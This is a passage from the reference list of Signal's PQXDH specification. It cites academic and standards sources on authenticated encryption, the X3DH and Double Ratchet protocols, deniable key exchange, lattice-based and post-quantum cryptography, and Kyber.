P. Rogaway, “Authenticated-encryption with Associated-data,” in Proceedings of the 9th ACM Conference on Computer and Communications Security, 2002. http://web.cs.ucdavis.edu/~rogaway/papers/ad.pdf

[6]

M. Marlinspike and T. Perrin, “The X3DH Key Agreement Protocol,” 2016. https://signal.org/docs/specifications/x3dh/

[7]

T. Perrin and M. Marlinspike, “The Double Ratchet Algorithm,” 2016. https://signal.org/docs/specifications/doubleratchet/

[8]

K. Cohn-Gordon, C. Cremers, B. Dowling, L. Garratt, and D. Stebila, “A formal security analysis of the signal messaging protocol,” J. Cryptol., vol. 33, no. 4, 2020. https://doi.org/10.1007/s00145-020-09360-1

[9]

T. Okamoto and D. Pointcheval, “The gap-problems: A new class of problems for the security of cryptographic schemes,” in Proceedings of the 4th international workshop on practice and theory in public key cryptography: Public key cryptography, 2001.

[10]

A. Langlois and D. Stehlé, “Worst-case to average-case reductions for module lattices,” Des. Codes Cryptography, vol. 75, no. 3, Jun. 2015. https://doi.org/10.1007/s10623-014-9938-4

[11]

N. Unger and I. Goldberg, “Deniable Key Exchanges for Secure Messaging,” in Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015. https://cypherpunks.ca/~iang/pubs/dake-ccs15.pdf

[12]

J. Brendel, R. Fiedler, F. Günther, C. Janson, and D. Stebila, “Post-quantum asynchronous deniable key exchange and the signal handshake,” in Public-key cryptography – PKC 2022 – 25th IACR international conference on practice and theory of public-key cryptography, virtual event, march 8-11, 2022, proceedings, part II, 2022, vol. 13178. https://doi.org/10.1007/978-3-030-97131-1_1

[13]

N. Vatandas, R. Gennaro, B. Ithurburn, and H. Krawczyk, “On the cryptographic deniability of the signal protocol,” in Applied cryptography and network security – 18th international conference, ACNS 2020, rome, italy, october 19-22, 2020, proceedings, part II, 2020, vol. 12147. https://doi.org/10.1007/978-3-030-57878-7_10

[14]

D. Hofheinz, K. Hövelmanns, and E. Kiltz, “A modular analysis of the fujisaki-okamoto transformation,” in Theory of cryptography – 15th international conference, TCC 2017, baltimore, MD, USA, november 12-15, 2017, proceedings, part I, 2017, vol. 10677. https://doi.org/10.1007/978-3-319-70500-2_12

[15]

K. Hashimoto, S. Katsumata, K. Kwiatkowski, and T. Prest, “An efficient and generic construction for signal’s handshake (X3DH): Post-quantum, state leakage secure, and deniable,” J. Cryptol., vol. 35, no. 3, 2022. https://doi.org/10.1007/s00145-022-09427-1

[16]

NIST, “Post-quantum cryptography.” https://csrc.nist.gov/Projects/post-quantum-cryptography

[17]

“Kyber key encapsulation mechanism.” https://pq-crystals.org/kyber/

Source :
https://signal.org/docs/specifications/pqxdh/